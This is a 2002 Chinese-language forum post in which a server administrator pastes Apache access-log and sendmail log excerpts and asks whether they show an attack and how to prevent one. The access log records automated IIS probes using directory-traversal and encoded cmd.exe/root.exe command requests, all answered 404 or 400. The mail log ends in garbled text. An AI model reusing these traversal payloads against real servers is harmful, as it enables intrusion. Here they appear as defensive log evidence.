由 cfs2 在 10-06-2002 10:06 发表:
请大侠帮忙看看我的日志,是不是有人攻击,谢谢!
大家看看这几段日志,是不是有人在攻击?攻击成功了吗?w我该怎样防止这样的情况发生?有没有什么软件可以更方便的监视网络的运行情况,以及有哪些人在访问哪些服务?谢谢!
webserver 是 apache 1.3.26
mail server是 qmail
httpd-access.log文件
218.2.194.143 - - [29/Aug/2002:22:28:59 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:28:59 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:28:59 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:00 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
218.2.194.143 - - [29/Aug/2002:22:29:01 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
maillog 文件
Oct 5 00:00:00 server newsyslog[1581]: logfile turned over
Oct 5 03:01:08 server sendmail[1816]: gethostbyaddr(IPv6:::1) failed: 1
Oct 5 03:01:08 server sendmail[1816]: gethostbyaddr(218.2.159.2) failed: 1
Oct 5 03:01:08 server sendmail[1816]: gethostbyaddr(218.2.159.231) failed: 1
Oct 5 03:01:08 server sendmail[1816]: gethostbyaddr(218.2.158.44) failed: 1
Oct 5 03:01:53 server sendmail[1950]: g94J1r99001950: from=root, size=438, class=0, nrcpts=1, msgid=<[email protected]>, relay=root@localhost
Oct 5 03:01:53 server sendmail[1989]: gethostbyaddr(IPv6:::1) failed: 1
Oct 5 03:01:54 server sendmail[1989]: gethostbyaddr(218.2.159.2) failed: 1
Oct 5 03:01:54 server sendmail[1989]: gethostbyaddr(218.2.159.231) failed: 1
Oct 5 03:01:54 server sendmail[1994]: g94J1sYC001994: from=root, size=2573, class=0, nrcpts=1, msgid=<[email protected]>, relay=root@localhost
Oct 5 03:01:54 server sendmail[1989]: gethostbyaddr(218.2.158.44) failed: 1
Oct 5 03:01:54 server sm-mta[1998]: g94J1sSC001998: from=
1<[email protected]>, size=770, class=0, nrcpts=1, msgid=<[email protected]>, proto=ESMTP, daemon=Daemon0, relay=localhost.mydomain.com [127.0.0.1]
2
3Oct 5 03:01:54 server sendmail[1950]: g94J1r99001950: to=root, ctladdr=root (0/0), delay=00:00:01, xdelay=00:00:01, mailer=relay, pri=30063, relay=localhost.mydomain.com. [127.0.0.1], dsn=2.0.0, stat=Sent (g94J1sSC001998 Message accepted for delivery)
4
5Oct 5 03:01:54 server sm-mta[1999]: g94J1sSC001999: from=<[email protected]>, size=2905, class=0, nrcpts=1, msgid=<[email protected]>, proto=ESMTP, daemon=Daemon0, relay=localhost.mydomain.com [127.0.0.1]
6
7Oct 5 03:01:54 server sendmail[1994]: g94J1sYC001994: to=root, ctladdr=root (0/0), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30060, relay=localhost.mydomain.com. [127.0.0.1], dsn=2.0.0, stat=Sent (g94J1sSC001999 Message accepted for delivery)
8
9Oct 5 03:01:54 server sm-mta[2000]: g94J1sSC001998: to=<[email protected]>, ctladdr=<[email protected]</[email protected]></[email protected]></[email protected]>